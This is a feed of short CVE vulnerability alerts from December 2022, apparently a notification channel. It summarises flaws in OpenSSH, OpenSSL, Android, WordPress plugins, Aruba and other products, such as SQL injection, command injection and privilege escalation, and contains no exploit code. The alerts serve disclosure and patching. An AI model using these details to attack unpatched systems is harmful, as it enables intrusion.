|
| 2022-12-13 19:29:35 |
🚨 CVE-2016-8724An exploitable information disclosure vulnerability exists in the serviceAgent functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted TCP query will allow an attacker to retrieve potentially sensitive information.🎖@cveNotify |
|
| 2022-12-13 18:30:07 |
🚨 CVE-2022-20482In createNotificationChannel of NotificationManager.java, there is a possible way to make the device unusable and require factory reset due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-240422263🎖@cveNotify |
|
| 2022-12-13 18:30:03 |
🚨 CVE-2022-20485In NotificationChannel of NotificationChannel.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242702935🎖@cveNotify |
|
| 2022-12-13 18:30:02 |
🚨 CVE-2022-43517A vulnerability has been identified in Simcenter STAR-CCM+ (All versions). The affected application improperly assigns file permissions to installation folders.This could allow a local attacker with an unprivileged account to override or modify the service executables and subsequently gain elevated privileges.🎖@cveNotify |
|
| 2022-12-13 18:30:01 |
🚨 CVE-2022-20495In getEnabledAccessibilityServiceList of AccessibilityManager.java, there is a possible way to hide an accessibility service due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243849844🎖@cveNotify |
|
| 2022-12-13 18:30:00 |
🚨 CVE-2022-20501In onCreate of EnableAccountPreferenceActivity.java, there is a possible way to mislead the user into enabling a malicious phone account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-246933359🎖@cveNotify |
|
| 2022-12-13 16:29:58 |
🚨 CVE-2022-4408Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.9.🎖@cveNotify |
|
| 2022-12-13 16:29:57 |
🚨 CVE-2022-42824A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may disclose sensitive user information.🎖@cveNotify |
|
| 2022-12-13 16:29:56 |
🚨 CVE-2022-4396** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function _get_option of the file pyRdfa/__init__.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e. It is recommended to apply a patch to fix this issue. The identifier VDB-215249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2022-12-13 16:29:53 |
🚨 CVE-2022-45145egg-compile.scm in CHICKEN 5.x before 5.3.1 allows arbitrary OS command execution during package installation via escape characters in a .egg file.🎖@cveNotify |
|
| 2022-12-13 16:29:52 |
🚨 CVE-2022-45227The web portal of Dragino Lora LG01 18ed40 IoT v4.3.4 has the directory listing at the URL https://10.10.20.74/lib/. This address has a backup file which can be downloaded without any authentication.🎖@cveNotify |
|
| 2022-12-13 16:29:51 |
🚨 CVE-2022-42823A type confusion issue was addressed with improved memory handling. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2022-12-13 16:29:50 |
🚨 CVE-2022-4397A vulnerability was found in morontt zend-blog-number-2. It has been classified as problematic. Affected is an unknown function of the file application/forms/Comment.php of the component Comment Handler. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is 36b2d4abe20a6245e4f8df7a4b14e130b24d429d. It is recommended to apply a patch to fix this issue. VDB-215250 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-13 16:29:49 |
🚨 CVE-2022-4399A vulnerability was found in TicklishHoneyBee nodau. It has been rated as critical. Affected by this issue is some unknown functionality of the file src/db.c. The manipulation of the argument value/name leads to sql injection. The name of the patch is 7a7d737a3929f335b9717ddbd31db91151b69ad2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215252.🎖@cveNotify |
|
| 2022-12-13 16:29:45 |
🚨 CVE-2022-4400A vulnerability was found in zbl1996 FS-Blog and classified as problematic. This issue affects some unknown processing of the component Title Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-215267.🎖@cveNotify |
|
| 2022-12-13 16:29:44 |
🚨 CVE-2019-14274MCPP 2.7.2 has a heap-based buffer overflow in the do_msg() function in support.c.🎖@cveNotify |
|
| 2022-12-13 16:29:43 |
🚨 CVE-2022-40939In certain Secustation products the administrator account password can be read. This affects V2.5.5.3116-S50-SMA-B20171107A, V2.3.4.1301-M20-TSA-B20150617A, V2.5.5.3116-S50-RXA-B20180502A, V2.5.5.3116-S50-SMA-B20190723A, V2.5.5.3116-S50-SMB-B20161012A, V2.3.4.2103-S50-NTD-B20170508B, V2.5.5.3116-S50-SMB-B20160601A, V2.5.5.2601-S50-TSA-B20151229A, and V2.5.5.3116-S50-SMA-B20170217.🎖@cveNotify |
|
| 2022-12-13 16:29:40 |
🚨 CVE-2022-38124Debug tool in Secomea SiteManager allows logged-in administrator to modify system state in an unintended manner.🎖@cveNotify |
|
| 2022-12-13 16:29:39 |
🚨 CVE-2022-46047AeroCMS v0.0.1 is vulnerable to SQL Injection via the delete parameter.🎖@cveNotify |
|
| 2022-12-13 16:29:38 |
🚨 CVE-2022-46061AeroCMS v0.0.1 is vulnerable to ClickJacking.🎖@cveNotify |
|
| 2022-12-13 16:29:37 |
🚨 CVE-2022-45228Dragino Lora LG01 18ed40 IoT v4.3.4 was discovered to contain a Cross-Site Request Forgery in the logout page.🎖@cveNotify |
|
| 2022-12-13 14:30:06 |
🚨 CVE-2018-20685In OpenSSH 7.9, scp.c in the scp client allows remote SSH servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side.🎖@cveNotify |
|
| 2022-12-13 14:30:05 |
🚨 CVE-2019-6111An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).🎖@cveNotify |
|
| 2022-12-13 14:30:04 |
🚨 CVE-2016-6515The auth_password function in auth-passwd.c in sshd in OpenSSH before 7.3 does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string.🎖@cveNotify |
|
| 2022-12-13 14:30:03 |
🚨 CVE-2018-15473OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.🎖@cveNotify |
|
| 2022-12-13 14:30:02 |
🚨 CVE-2016-8858** DISPUTED ** The kex_input_kexinit function in kex.c in OpenSSH 6.x and 7.x through 7.3 allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate KEXINIT requests. NOTE: a third party reports that "OpenSSH upstream does not consider this as a security issue."🎖@cveNotify |
|
| 2022-12-13 14:29:58 |
🚨 CVE-2016-6308statem/statem_dtls.c in the DTLS implementation in OpenSSL 1.1.0 before 1.1.0a allocates memory before checking for an excessive length, which might allow remote attackers to cause a denial of service (memory consumption) via crafted DTLS messages.🎖@cveNotify |
|
| 2022-12-13 14:29:57 |
🚨 CVE-2016-6302The tls_decrypt_ticket function in ssl/t1_lib.c in OpenSSL before 1.1.0 does not consider the HMAC size during validation of the ticket length, which allows remote attackers to cause a denial of service via a ticket that is too short.🎖@cveNotify |
|
| 2022-12-13 14:29:56 |
🚨 CVE-2016-6307The state-machine implementation in OpenSSL 1.1.0 before 1.1.0a allocates memory before checking for an excessive length, which might allow remote attackers to cause a denial of service (memory consumption) via crafted TLS messages, related to statem/statem.c and statem/statem_lib.c.🎖@cveNotify |
|
| 2022-12-13 14:29:55 |
🚨 CVE-2016-6210sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.🎖@cveNotify |
|
| 2022-12-13 14:29:51 |
🚨 CVE-2016-6306The certificate parser in OpenSSL before 1.0.1u and 1.0.2 before 1.0.2i might allow remote attackers to cause a denial of service (out-of-bounds read) via crafted certificate operations, related to s3_clnt.c and s3_srvr.c.🎖@cveNotify |
|
| 2022-12-13 14:29:50 |
🚨 CVE-2016-6304Multiple memory leaks in t1_lib.c in OpenSSL before 1.0.1u, 1.0.2 before 1.0.2i, and 1.1.0 before 1.1.0a allow remote attackers to cause a denial of service (memory consumption) via large OCSP Status Request extensions.🎖@cveNotify |
|
| 2022-12-13 14:29:49 |
🚨 CVE-2016-6303Integer overflow in the MDC2_Update function in crypto/mdc2/mdc2dgst.c in OpenSSL before 1.1.0 allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.🎖@cveNotify |
|
| 2022-12-13 14:29:48 |
🚨 CVE-2014-8176The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.🎖@cveNotify |
|
| 2022-12-13 14:29:47 |
🚨 CVE-2019-1552OpenSSL has internal defaults for a directory tree where it can find a configuration file as well as certificates used for verification in TLS. This directory is most commonly referred to as OPENSSLDIR, and is configurable with the --prefix / --openssldir configuration options. For OpenSSL versions 1.1.0 and 1.1.1, the mingw configuration targets assume that resulting programs and libraries are installed in a Unix-like environment and the default prefix for program installation as well as for OPENSSLDIR should be '/usr/local'. However, mingw programs are Windows programs, and as such, find themselves looking at sub-directories of 'C:/usr/local', which may be world writable, which enables untrusted users to modify OpenSSL's default configuration, insert CA certificates, modify (or even replace) existing engine modules, etc. For OpenSSL 1.0.2, '/usr/local/ssl' is used as default for OPENSSLDIR on all Unix and Windows targets, including Visual C builds. However, some build instructions for the diverse Windows targets on 1.0.2 encourage you to specify your own --prefix. OpenSSL versions 1.1.1, 1.1.0 and 1.0.2 are affected by this issue. Due to the limited scope of affected deployments this has been assessed as low severity and therefore we are not creating new releases at this time. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).🎖@cveNotify |
|
| 2022-12-13 14:29:43 |
🚨 CVE-2015-6563The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c.🎖@cveNotify |
|
| 2022-12-13 14:29:42 |
🚨 CVE-2015-6564Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request.🎖@cveNotify |
|
| 2022-12-13 14:29:41 |
🚨 CVE-2015-6565sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY devices, which allows local users to cause a denial of service (terminal disruption) or possibly have unspecified other impact by writing to a device, as demonstrated by writing an escape sequence.🎖@cveNotify |
|
| 2022-12-13 06:47:45 |
🚨 CVE-2019-3633Buffer overflow in McAfee Data Loss Prevention (DLPe) for Windows 11.x prior to 11.3.2.8 allows local user to cause the Windows operating system to "blue screen" via a carefully constructed message sent to DLPe which bypasses DLPe internal checks and results in DLPe reading unallocated memory.🎖@cveNotify |
|
| 2022-12-13 06:47:44 |
🚨 CVE-2019-3632Directory Traversal vulnerability in McAfee Enterprise Security Manager (ESM) prior to 11.2.0 and prior to 10.4.0 allows authenticated user to gain elevated privileges via specially crafted input.🎖@cveNotify |
|
| 2022-12-13 06:47:43 |
🚨 CVE-2019-3630Command Injection vulnerability in McAfee Enterprise Security Manager (ESM) prior to 11.2.0 and prior to 10.4.0 allows authenticated user to execute arbitrary code via specially crafted parameters.🎖@cveNotify |
|
| 2022-12-13 06:47:39 |
🚨 CVE-2021-3859A flaw was found in Undertow that tripped the client-side invocation timeout with certain calls made over HTTP2. This flaw allows an attacker to carry out denial of service attacks.🎖@cveNotify |
|
| 2022-12-13 06:47:38 |
🚨 CVE-2022-39346Nextcloud server is an open source personal cloud server. Affected versions of nextcloud server did not properly limit user display names which could allow a malicious users to overload the backing database and cause a denial of service. It is recommended that the Nextcloud Server is upgraded to 22.2.10, 23.0.7 or 24.0.3. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-12-13 06:47:37 |
🚨 CVE-2021-20303A flaw found in function dataWindowForTile() of IlmImf/ImfTiledMisc.cpp. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger an integer overflow, leading to an out-of-bounds write on the heap. The greatest impact of this flaw is to application availability, with some potential impact to data integrity as well.🎖@cveNotify |
|
| 2022-12-13 06:47:36 |
🚨 CVE-2022-40303An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault.🎖@cveNotify |
|
| 2022-12-13 06:47:32 |
🚨 CVE-2022-1632An Improper Certificate Validation attack was found in Openshift. A re-encrypt Route with destinationCACertificate explicitly set to the default serviceCA skips internal Service TLS certificate validation. This flaw allows an attacker to exploit an invalid certificate, resulting in a loss of confidentiality.🎖@cveNotify |
|
| 2022-12-13 06:47:31 |
🚨 CVE-2021-20302A flaw was found in OpenEXR's TiledInputFile functionality. This flaw allows an attacker who can submit a crafted single-part non-image to be processed by OpenEXR, to trigger a floating-point exception error. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2022-12-13 06:47:30 |
🚨 CVE-2019-4330IBM Security Guardium Big Data Intelligence (SonarG) 4.0 does not set the secure attribute for cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session. IBM X-Force ID: 161210.🎖@cveNotify |
|
| 2022-12-13 06:47:25 |
🚨 CVE-2021-20299A flaw was found in OpenEXR's Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2022-12-13 06:47:24 |
🚨 CVE-2022-28958** DISPUTED ** D-Link DIR816L_FW206b01 was discovered to contain a remote code execution (RCE) vulnerability via the value parameter at shareport.php. NOTE: this has been disputed by a third party.🎖@cveNotify |
|
| 2022-12-12 22:47:54 |
🚨 CVE-2022-41215SAP NetWeaver ABAP Server and ABAP Platform allows an unauthenticated attacker to redirect users to a malicious site due to insufficient URL validation. This could lead to the user being tricked to disclose personal information.🎖@cveNotify |
|
| 2022-12-12 22:47:53 |
🚨 CVE-2022-42315Xenstore: guests can let run xenstored out of memory T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Malicious guests can cause xenstored to allocate vast amounts of memory, eventually resulting in a Denial of Service (DoS) of xenstored. There are multiple ways how guests can cause large memory allocations in xenstored: - - by issuing new requests to xenstored without reading the responses, causing the responses to be buffered in memory - - by causing large number of watch events to be generated via setting up multiple xenstore watches and then e.g. deleting many xenstore nodes below the watched path - - by creating as many nodes as allowed with the maximum allowed size and path length in as many transactions as possible - - by accessing many nodes inside a transaction🎖@cveNotify |
|
| 2022-12-12 22:47:52 |
🚨 CVE-2022-4413Cross-site Scripting (XSS) - Reflected in GitHub repository nuxt/framework prior to v3.0.0-rc.13.🎖@cveNotify |
|
| 2022-12-12 22:47:48 |
🚨 CVE-2022-33748lock order inversion in transitive grant copy handling As part of XSA-226 a missing cleanup call was inserted on an error handling path. While doing so, locking requirements were not paid attention to. As a result two cooperating guests granting each other transitive grants can cause locks to be acquired nested within one another, but in respectively opposite order. With suitable timing between the involved grant copy operations this may result in the locking up of a CPU.🎖@cveNotify |
|
| 2022-12-12 22:47:47 |
🚨 CVE-2022-45759SENS v1.0 has a file upload vulnerability.🎖@cveNotify |
|
| 2022-12-12 22:47:46 |
🚨 CVE-2022-4147Quarkus CORS filter allows simple GET and POST requests with invalid Origin to proceed. Simple GET or POST requests made with XMLHttpRequest are the ones which have no event listeners registered on the object returned by the XMLHttpRequest upload property and have no ReadableStream object used in the request.🎖@cveNotify |
|
| 2022-12-12 22:47:42 |
🚨 CVE-2022-45758SENS v1.0 is vulnerable to Cross Site Scripting (XSS) via com.liuyanzhao.sens.web.controller.admin, getRegister.🎖@cveNotify |
|
| 2022-12-12 22:47:41 |
🚨 CVE-2022-44031Redmine before 4.2.9 and 5.0.x before 5.0.4 allows persistent XSS in its Textile formatter due to improper sanitization of the blockquote syntax in Textile-formatted fields.🎖@cveNotify |
|
| 2022-12-12 22:47:37 |
🚨 CVE-2022-46683Jenkins Google Login Plugin 1.4 through 1.6 (both inclusive) improperly determines that a redirect URL after login is legitimately pointing to Jenkins.🎖@cveNotify |
|
| 2022-12-12 22:47:36 |
🚨 CVE-2022-46686Jenkins Custom Build Properties Plugin 2.79.vc095ccc85094 and earlier does not escape property values and build display names on the Custom Build Properties and Build Summary pages, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to set or change these values.🎖@cveNotify |
|
| 2022-12-12 19:47:45 |
🚨 CVE-2022-37916Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.🎖@cveNotify |
|
| 2022-12-12 19:47:44 |
🚨 CVE-2022-39898Improper access control vulnerability in IIccPhoneBook prior to SMR Dec-2022 Release 1 allows attackers to access some information of usim.🎖@cveNotify |
|
| 2022-12-12 19:47:43 |
🚨 CVE-2020-1045A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names.The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded.The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names., aka 'Microsoft ASP.NET Core Security Feature Bypass Vulnerability'.🎖@cveNotify |
|
| 2022-12-12 19:47:42 |
🚨 CVE-2022-4364A vulnerability classified as critical has been found in Teledyne FLIR AX8 up to 1.46.16. Affected is an unknown function of the file palette.php of the component Web Service Handler. The manipulation of the argument palette leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-215118 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-12 19:47:41 |
🚨 CVE-2022-42458Authentication bypass using an alternate path or channel vulnerability in bingo!CMS version1.7.4.1 and earlier allows a remote unauthenticated attacker to upload an arbitrary file. As a result, an arbitrary script may be executed and/or a file may be altered.🎖@cveNotify |
|
| 2022-12-12 19:47:40 |
🚨 CVE-2022-41948DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Affected versions are subject to a privilege escalation vulnerability. A DHIS2 user with authority to manage users can assign superuser privileges to themself by manually crafting an HTTP PUT request. Only users with the following DHIS2 user role authorities can exploit this vulnerability. Note that in many systems the only users with user admin privileges are also superusers. In these cases, the escalation vulnerability does not exist. The vulnerability is only exploitable by attackers who can authenticate as users with the user admin authority. As this is usually a small and relatively trusted set of users, exploit vectors will often be limited. DHIS2 administrators should upgrade to the following hotfix releases: 2.36.12.1, 2.37.8.1, 2.38.2.1, 2.39.0.1. The only known workaround to this issue is to avoid the assignment of the user management authority to any users until the patch has been applied.🎖@cveNotify |
|
| 2022-12-12 19:47:39 |
🚨 CVE-2022-39901Improper authentication in Exynos baseband prior to SMR DEC-2022 Release 1 allows remote attacker to disable the network traffic encryption between UE and gNodeB.🎖@cveNotify |
|
| 2022-12-12 19:47:38 |
🚨 CVE-2022-3900The Cooked Pro WordPress plugin before 1.7.5.7 does not properly validate or sanitize the recipe_args parameter before unserializing it in the cooked_loadmore action, allowing an unauthenticated attacker to trigger a PHP Object injection vulnerability.🎖@cveNotify |
|
| 2022-12-12 19:47:37 |
🚨 CVE-2022-3912The User Registration WordPress plugin before 2.2.4.1 does not properly restrict the files to be uploaded via an AJAX action available to both unauthenticated and authenticated users, which could allow unauthenticated users to upload PHP files for example.🎖@cveNotify |
|
| 2022-12-12 19:47:36 |
🚨 CVE-2022-3915The Dokan WordPress plugin before 3.7.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users🎖@cveNotify |
|
| 2022-12-12 19:47:34 |
🚨 CVE-2022-3919The Jetpack CRM WordPress plugin before 5.4.3 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2022-12-12 19:47:33 |
🚨 CVE-2022-3921The does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE🎖@cveNotify |
|
| 2022-12-12 19:47:31 |
🚨 CVE-2022-3359The Shortcodes and extra features for Phlox WordPress plugin through 2.10.5 unserializes the content of an imported file, which could lead to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.🎖@cveNotify |
|
| 2022-12-12 19:47:30 |
🚨 CVE-2022-3605The WP CSV Exporter WordPress plugin before 1.3.7 does not properly escape the fields when exporting data as CSV, leading to a CSV injection vulnerability.🎖@cveNotify |
|
| 2022-12-12 19:47:29 |
🚨 CVE-2022-3609The GetYourGuide Ticketing WordPress plugin before 1.0.4 does not sanitise and escape some parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2022-12-12 19:47:28 |
🚨 CVE-2022-3853Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application.🎖@cveNotify |
|
| 2022-12-12 19:47:27 |
🚨 CVE-2022-3862The Livemesh Addons for Elementor WordPress plugin before 7.2.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-12 19:47:25 |
🚨 CVE-2022-3879The Car Dealer (Dealership) and Vehicle sales WordPress Plugin WordPress plugin before 3.05 does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org🎖@cveNotify |
|
| 2022-12-12 19:47:24 |
🚨 CVE-2022-3880The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan WordPress plugin before 4.20 does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org🎖@cveNotify |
|
| 2022-12-12 19:47:23 |
🚨 CVE-2022-3881The WP Tools Increase Maximum Limits, Repair, Server PHP Info, Javascript errors, File Permissions, Transients, Error Log WordPress plugin before 3.43 does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org🎖@cveNotify |
|
| 2022-12-12 16:47:50 |
🚨 CVE-2022-45968Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one).🎖@cveNotify |
|
| 2022-12-12 16:47:49 |
🚨 CVE-2022-45970Alist v3.5.1 is vulnerable to Cross Site Scripting (XSS) via the bulletin board.🎖@cveNotify |
|
| 2022-12-12 16:47:48 |
🚨 CVE-2022-4421A vulnerability was found in rAthena FluxCP. It has been classified as problematic. Affected is an unknown function of the file themes/default/servicedesk/view.php of the component Service Desk Image URL Handler. The manipulation of the argument sslink leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 8a39b2b2bf28353b3503ff1421862393db15aa7e. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215304.🎖@cveNotify |
|
| 2022-12-12 16:47:47 |
🚨 CVE-2021-3942Certain HP Print products and Digital Sending products may be vulnerable to potential remote code execution and buffer overflow with use of Link-Local Multicast Name Resolution or LLMNR.🎖@cveNotify |
|
| 2022-12-12 16:47:46 |
🚨 CVE-2022-22488IBM OpenBMC OP910 and OP940 could allow a privileged user to cause a denial of service by uploading or deleting too many CA certificates in a short period of time. IBM X-Force ID: 2226337.🎖@cveNotify |
|
| 2022-12-12 16:47:42 |
🚨 CVE-2022-37899Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2022-12-12 16:47:41 |
🚨 CVE-2022-37900Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2022-12-12 16:47:40 |
🚨 CVE-2022-37905Vulnerabilities in ArubaOS running on 7xxx series controllers exist that allows an attacker to execute arbitrary code during the boot sequence. Successful exploitation could allow an attacker to achieve permanent modification of the underlying operating system.🎖@cveNotify |
|
| 2022-12-12 16:47:39 |
🚨 CVE-2022-37912Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2022-12-12 16:47:38 |
🚨 CVE-2022-3510A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.🎖@cveNotify |
|
| 2022-12-12 16:47:34 |
🚨 CVE-2022-42445HCL Launch could allow a user with administrative privileges, including "Manage Security" permissions, the ability to recover a credential previously saved for performing authenticated LDAP searches.🎖@cveNotify |
|
| 2022-12-12 16:47:33 |
🚨 CVE-2022-43541Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below.🎖@cveNotify |
|
| 2022-12-12 16:47:32 |
🚨 CVE-2022-43542Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below.🎖@cveNotify |
|
| 2022-12-12 16:47:31 |
🚨 CVE-2022-43780Certain HP ENVY, OfficeJet, and DeskJet printers may be vulnerable to a Denial of Service attack.🎖@cveNotify |
|
| 2022-12-12 16:47:30 |
🚨 CVE-2022-44532An authenticated path traversal vulnerability exists in the Aruba EdgeConnect Enterprise command line interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files on the underlying operating system, including sensitive system files in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below.🎖@cveNotify |
|
| 2022-12-12 16:47:26 |
🚨 CVE-2022-44533A vulnerability in the Aruba EdgeConnect Enterprise web management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below.🎖@cveNotify |
|
| 2022-12-12 16:47:25 |
🚨 CVE-2022-44647An Out-of-bounds read vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to disclose sensitive information on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is similar to, but not the same as CVE-2022-44648.🎖@cveNotify |
|
| 2022-12-12 16:47:24 |
🚨 CVE-2022-44649An out-of-bounds access vulnerability in the Unauthorized Change Prevention service of Trend Micro Apex One and Apex One as a Service could allow a local attacker to elevate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2022-12-12 16:47:23 |
🚨 CVE-2022-44650A memory corruption vulnerability in the Unauthorized Change Prevention service of Trend Micro Apex One and Apex One as a Service could allow a local attacker to elevate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2022-12-12 14:47:25 |
🚨 CVE-2022-3485In IFM Moneo Appliance with version up to 1.9.3 an unauthenticated remote attacker can reset the administrator password by only supplying the serial number.🎖@cveNotify |
|
